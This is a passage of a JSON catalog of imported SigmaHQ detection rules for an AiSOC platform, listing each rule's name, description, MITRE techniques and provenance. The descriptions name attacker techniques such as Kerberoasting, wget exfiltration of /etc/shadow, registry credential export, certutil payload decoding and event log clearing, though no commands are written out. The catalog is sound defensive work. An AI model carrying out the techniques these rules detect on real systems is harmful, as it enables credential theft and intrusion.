"T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-subscription-permission-elevation-via-auditlogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "ca9bf243-465e-494a-9e54-bf9fc239057d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml" } }, { "id": "sigmahq-sigma-caa02837-f659-466f-bca6-48bde2826ab4", "type": "detection", "name": "Potential DLL Sideloading Via ClassicExplorer32.dll", "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-classicexplorer32-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa02837-f659-466f-bca6-48bde2826ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_classicexplorer32.yml" } }, { "id": "sigmahq-sigma-caa06de8-fdef-4c91-826a-7f9e163eef4b", "type": "detection", "name": "RunDLL32 Spawning Explorer", "description": "Detects RunDLL32.exe spawning explorer.exe as a child process, which is very uncommon; Gamarue has often been observed spawning the explorer.exe process in this unusual way", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/rundll32-spawning-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_spawn_explorer.yml" } }, { "id": "sigmahq-sigma-caa9a802-8bd8-4b9e-a5cd-4d6221670219", "type": "detection", "name": "Suspicious Kerberos Ticket Request via CLI", "description": "Detects suspicious Kerberos ticket requests via command line using System.IdentityModel.Tokens.KerberosRequestorSecurityToken class.\nThreat actors may use command line interfaces to request Kerberos tickets for service accounts in order to\nperform offline password cracking attacks commonly known as Kerberoasting or other Kerberos ticket abuse\ntechniques like silver ticket attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-ticket-request-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caa9a802-8bd8-4b9e-a5cd-4d6221670219", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml" } }, { "id": "sigmahq-sigma-cacef8fc-9d3d-41f7-956d-455c6e881bc5", "type": 
"detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cacef8fc-9d3d-41f7-956d-455c6e881bc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-cad1fe90-2406-44dc-bd03-59d0b58fe722", "type": "detection", "name": "HackTool - NPPSpy Hacktool Usage", "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-nppspy-hacktool-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"cad1fe90-2406-44dc-bd03-59d0b58fe722", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" } }, { "id": "sigmahq-sigma-cae80281-ef23-44c5-873b-fd48d2666f49", "type": "detection", "name": "PowerShell Script Change Permission Via Set-Acl - PsScript", "description": "Detects PowerShell scripts that set the ACL of a file or a folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-change-permission-via-set-acl-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cae80281-ef23-44c5-873b-fd48d2666f49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_set_acl.yml" } }, { "id": "sigmahq-sigma-caf201a9-c2ce-4a26-9c3a-2b9525413711", "type": "detection", "name": "Potentially Suspicious Call To Win32_NTEventlogFile Class", "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) 
from a PowerShell script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-call-to-win32-nteventlogfile-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "caf201a9-c2ce-4a26-9c3a-2b9525413711", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml" } }, { "id": "sigmahq-sigma-cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "type": "detection", "name": "PrintBrm ZIP Creation of Extraction", "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/printbrm-zip-creation-of-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" } }, { "id": "sigmahq-sigma-cb0fe7c5-f3a3-484d-aa25-d350a7912729", "type": "detection", "name": "Suspicious Driver/DLL Installation Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. 
This is often used as a defense evasion method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-driver-dll-installation-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb0fe7c5-f3a3-484d-aa25-d350a7912729", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" } }, { "id": "sigmahq-sigma-cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "type": "detection", "name": "Data Exfiltration with Wget", "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-exfiltration-with-wget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/linux/auditd/execve/lnx_auditd_data_exfil_wget.yml" } }, { "id": "sigmahq-sigma-cb5a2333-56cf-4562-8fcb-22ba1bca728d", "type": "detection", "name": "Obfuscated IP Download Activity", "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-ip-download-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" } }, { "id": "sigmahq-sigma-cb7c4a03-2871-43c0-9bbb-18bbdb079896", "type": "detection", "name": "Unmount Share Via Net.EXE", "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unmount-share-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_share_unmount.yml" } }, { "id": "sigmahq-sigma-cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "type": "detection", "name": "Insecure Transfer Via Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insecure-transfer-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml" } }, { "id": "sigmahq-sigma-cbb56d62-4060-40f7-9466-d8aaf3123f83", "type": 
"detection", "name": "Python Image Load By Non-Python Process", "description": "Detects the image load of \"Python Core\" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.\nVarious tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.\nThreat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-image-load-by-non-python-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_python_image_load.yml" } }, { "id": "sigmahq-sigma-cbb67ecc-fb70-4467-9350-c910bdf7c628", "type": "detection", "name": "Added Credentials to Existing Application", "description": "Detects when a new credential is added to an existing application. 
Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/added-credentials-to-existing-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_credential_added.yml" } }, { "id": "sigmahq-sigma-cbb9e3d1-2386-4e59-912e-62f1484f7a89", "type": "detection", "name": "Conhost Spawned By Uncommon Parent Process", "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/conhost-spawned-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml" } }, { "id": "sigmahq-sigma-cbe51394-cd93-4473-b555-edf0144952d9", "type": "detection", "name": "DNS Server Error Failed Loading the ServerLevelPluginDLL", "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-server-error-failed-loading-the-serverlevelplugindll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbe51394-cd93-4473-b555-edf0144952d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-cbec226f-63d9-4eca-9f52-dfb6652f24df", "type": "detection", "name": "Suspicious Process Parents", "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-parents.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"cbec226f-63d9-4eca-9f52-dfb6652f24df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_parents.yml" } }, { "id": "sigmahq-sigma-cbf93e5d-ca6c-4722-8bea-e9119007c248", "type": "detection", "name": "CurrentVersion NT Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/currentversion-nt-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" } }, { "id": "sigmahq-sigma-cc1abf27-78a3-4ac5-a51c-f3070b1d8e40", "type": "detection", "name": "Registry Export of Third-Party Credentials", "description": "Detects the use of reg.exe to export registry paths associated with third-party credentials.\nCredential stealers have been known to use this technique to extract sensitive information from the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/registry-export-of-third-party-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc1abf27-78a3-4ac5-a51c-f3070b1d8e40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_export_of_thirdparty_creds.yml" } }, { "id": "sigmahq-sigma-cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "type": "detection", "name": "Devtoolslauncher.exe Executes Specified Binary", "description": "The Devtoolslauncher.exe executes other binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devtoolslauncher-exe-executes-specified-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml" } }, { "id": "sigmahq-sigma-cc368ed0-2411-45dc-a222-510ace303cb2", "type": "detection", "name": "Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location", "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-regasm-regsvcs-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc368ed0-2411-45dc-a222-510ace303cb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml" } }, { "id": "sigmahq-sigma-cc36992a-4671-4f21-a91d-6c2b72a2edf5", "type": "detection", "name": "Suspicious Eventlog Clearing or Configuration Change Activity", "description": "Detects the clearing or configuration tampering of EventLog using utilities such as \"wevtutil\", \"powershell\" and \"wmic\".\nThis technique were seen used by threat actors and ransomware strains in order to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685.005", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/suspicious-eventlog-clearing-or-configuration-change-activity.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" } }, { "id": "sigmahq-sigma-cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "type": "detection", "name": 
"Tasks Folder Evasion", "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application\nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tasks-folder-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml" } }, { "id": "sigmahq-sigma-cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "type": "detection", "name": "MSHTA Execution with Suspicious File Extensions", "description": "Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,\nsuch as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications\ncontaining VBScript or JScript. 
Threat actors often abuse this lolbin utility to download and\nexecute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1218.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mshta-execution-with-suspicious-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" } }, { "id": "sigmahq-sigma-cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "type": "detection", "name": "File Decoded From Base64/Hex Via Certutil.EXE", "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-decoded-from-base64-hex-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_decode.yml" } }, { "id": "sigmahq-sigma-cc9d3712-6310-4320-b2df-7cb408274d53", "type": "detection", "name": "Rebuild Performance Counter Values Via Lodctr.EXE", "description": "Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. 
This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rebuild-performance-counter-values-via-lodctr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "cc9d3712-6310-4320-b2df-7cb408274d53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml" } }, { "id": "sigmahq-sigma-ccb5742c-c248-4982-8c5c-5571b9275ad3", "type": "detection", "name": "Recon Command Output Piped To Findstr.EXE", "description": "Detects the execution of a potential recon command where the results are piped to \"findstr\". 
This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" for example.\nAttackers oftentimes use this technique to extract specific information they require in their reconnaissance phase.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/recon-command-output-piped-to-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ccb5742c-c248-4982-8c5c-5571b9275ad3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml" } }, { "id": "sigmahq-sigma-ccd55945-badd-4bae-936b-823a735d37dd", "type": "detection", "name": "Github Push Protection Disabled", "description": "Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-push-protection-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 